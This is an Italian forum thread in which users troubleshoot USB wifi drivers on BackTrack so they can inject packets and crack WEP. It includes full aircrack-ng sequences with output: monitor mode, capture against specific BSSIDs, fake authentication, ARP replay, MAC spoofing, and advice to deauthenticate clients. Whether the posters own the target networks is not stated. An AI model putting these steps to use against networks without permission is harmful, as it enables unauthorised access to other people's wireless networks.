Wifi injection- driver rt73 e rt2500usb

[go3mon]

Salve,
ho una scheda wifi usb ASUS wl-167g

Backtrack 4 me la riconosce automaticamente con il driver rt2500usb, visibile nell'applicazione GERIX.

Volevo sapere se questo modello supporta l'ARP injection.
Ho letto in giro che i driver rt73 sono meglio supportati allora li ho installati:

root@bt:~/rt73-k2wrlz-3.0.3/Module# lsmod | grep rt73
rt73 216576 0
rt73usb 26104 0
rt2x00usb 9684 2 rt2500usb,rt73usb
rt2x00lib 36436 3 rt2500usb,rt73usb,rt2x00usb


root@bt:~/rt73-k2wrlz-3.0.3/Module# iwconfig wlan1
wlan1 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.452 GHz Access Point: Not-Associated
Tx-Power=24 dBm
Retry min limit:7 RTS thrff Fragment thrff
Encryption keyff
Power Managementff
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

In GERIX vedo rt2500usb. come faccio ad usare i driver rt73?

Grazie

[ReversaL]

devi caricare i nuovi driver:

Code:

rmmod rt2500usb
modprobe rt73usb

poi quando attivi la monitor mode guarda quali driver ti trova airmon

ciao!

[go3mon]

Ciao,
prima di effettuare il cambio dei driver ho testato un'altra scheda wifi usb. La D-Link dwl-g122 che di default usa già i driver rt73usb.

Purtroppo, dopo averla messa in monitor mode (mon0) aireplay non cattura nessun DATA (rimane a 0).
Perchè?


-Pietro-

[ReversaL]

serve qualche altra info.. posta i tuoi comandi e l'output (qui o su pastebin) sia di airmon che di airodump.
puoi anche usare

Code:

aireplay-ng --test mon0

per fare una prova di injection

[go3mon]

Ciao:
ecco qualche info in piu.

root@bt:~# airmon-ng


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
mon0 Ralink 2573 USB rt73usb - [phy1]

root@bt:~#

root@bt:~# aireplay-ng --test mon0
10:44:39 Trying broadcast probe requests...
10:44:39 Injection is working!
10:44:41 Found 1 AP

10:44:41 Trying directed probe requests...
10:44:41 00:15:E9:F3:C0:90 - channel: 6 - 'Virgo2'
10:44:41 Ping (min/avg/max): 1.613ms/4.433ms/6.994ms Power: -44.87
10:44:41 30/30: 100%

root@bt:~#


A questo punto faccio:

#airmon-ng -w wep -c 6 --bssid 00:15:E9:F3:C0:90 wlan1
CH 6 ][ Elapsed: 7 mins ][ 2010-04-26 10:44

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:15:E9:F3:C0:90 -44 100 3460 0 0 6 54 WEP WEP Virgo2

BSSID STATION PWR Rate Lost Packets Probes


Apro un nuovo terminale:

aireplay-ng -1 0 -a 00:15:E9:F3:C0:90 -h 00:11:22:33:44:55 wlan1
p.s. in precedenza ho modificato il mio mac con macchanger

root@bt:~# aireplay-ng -1 0 -a 00:15:E9:F3:C0:90 -h 00:11:22:33:44:55 wlan1
10:39:30 Waiting for beacon frame (BSSID: 00:15:E9:F3:C0:90) on channel 6

10:39:30 Sending Authentication Request (Open System) [ACK]
10:39:30 Switching to shared key authentication
^Cad 2308 packets...
root@bt:~#

I pacchetti aumentano e nell'altro terminale il campo #DATA è sempre a 0.

[ReversaL]

#airmon-ng -w wep -c 6 --bssid 00:15:E9:F3:C0:90 wlan1

intendi airodump-ng!

e poi invece di wlan1, se quell'interfaccia sta in monitor mode su mon0, devi usare mon0!

googla un pò e rivediti i passaggi, è pieno di materiale ciao!

[go3mon]

Ciao,
si scusa era airodump!
Cmq ho cambiato wlan1 con mon0 e la situazione rimane invariata. il campo #DATA rimane sempre a 0.

[tiziano1111]

Ho un problema analogo a quello di Pietro go3mon .

Stessa scheda wireless ( USB DWL G122 ver C1) ... stessi drivers ...sembra che supporti l'injection ma non CATTURA gli IVs , segue procedura completa che ho effettuato su canale 6 :



root@bt:~# airmon-ng ( controllo se è attivata la scheda DLINK DWL G122 ver.C1 in monitor mode....)


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
mon0 Ralink 2573 USB rt73usb - [phy0]

root@bt:~#

root@bt:~# aireplay-ng --test mon0 (controllo se la scheda puo' fare INJECTION)

For information, no action required: Using gettimeofday() instead of /dev/rtc
14:41:00 Trying broadcast probe requests...
14:41:00 Injection is working!
14:41:02 Found 2 APs

14:41:02 Trying directed probe requests...
14:41:02 00:C0:49:D4:02:CF - channel: 6 - 'USR9106'
14:41:02 Ping (min/avg/max): 0.471ms/1.967ms/3.660ms Power: -60.33
14:41:02 30/30: 100%


root@bt:~# airodump-ng -w wep -c 6 --bssid 00:C0:49:D4:02:CF mon0 ( cattura pacchetti)

aireplay-ng -1 0 -a 00:C0:49:D4:02:CF -h 00:22:B0:74:DE:D0 mon0 ( primo attacco)

aireplay-ng -3 -b 00:C0:49:D4:02:CF -h 00:22:B0:74:DE:D0 mon0 ( secondo attacco)

Il tutto è mostrato in questo screen-shot che allego .
Ho l'impressione che , pur scegliendo la cattura pachetti sul canale 6 ( che è il canale di trasmissione della scheda wifi Dlink) , il Dump avviene su QUALSIASI CANALE tranne il ch 6 !!!

Infatti gli ARP vengono catturati ma vedo che ho un costante errore:

"Notice. Got a Deauth/disassoc paket. Is the source MAC associated?"

Qualcuno mi sa dare un consiglio? Allego screen shot delle shell dove si vede l'errore quando vengono catturati gli ARP.

[tiziano1111]

ooppss .... l'allegato

[ReversaL]

l'errore che ti da indica che il fake-client non è associato. forse passa troppo tempo tra l'invio della richiesta di falsa autenticazione e quella di arp-replay!
prova a prepararti i comandi (fake-auth e arp-replay) in due terminali diversi e dalli uno di seguito all'altro (ovviamente prima la fake auth).

se così ancora non dovesse funzionare, considera che ci sono degli AP che hanno bisogno di un'autenticazione continua.. il tempo dipende da ognuno, diciamo intorno ai 30 secondi!

per quanto riguarda il canale di airodump, basta vedere in alto a sinistra (CH) quale canale sta monitorando.

[OT] p.s.: bravo, così è più semplice.. tutti dovrebbero postare sia comandi che screenshot quando hanno problemi [/OT]



[EDIT]
per il problema di go3mon
ho riletto il thread, c'era un particolare importantissimo che mi era sfuggito:

Apro un nuovo terminale:

aireplay-ng -1 0 -a 00:15:E9:F3:C0:90 -h 00:11:22:33:44:55 wlan1
p.s. in precedenza ho modificato il mio mac con macchanger

root@bt:~# aireplay-ng -1 0 -a 00:15:E9:F3:C0:90 -h 00:11:22:33:44:55 wlan1
10:39:30 Waiting for beacon frame (BSSID: 00:15:E9:F3:C0:90) on channel 6

10:39:30 Sending Authentication Request (Open System) [ACK]
10:39:30 Switching to shared key authentication
^Cad 2308 packets...
root@bt:~#

se l'AP non è open, la normale fake-authentication non si può usare. bisogna deautenticare un client per ottenere la shared key, dai un occhiata QUI per i dettagli
[/EDIT]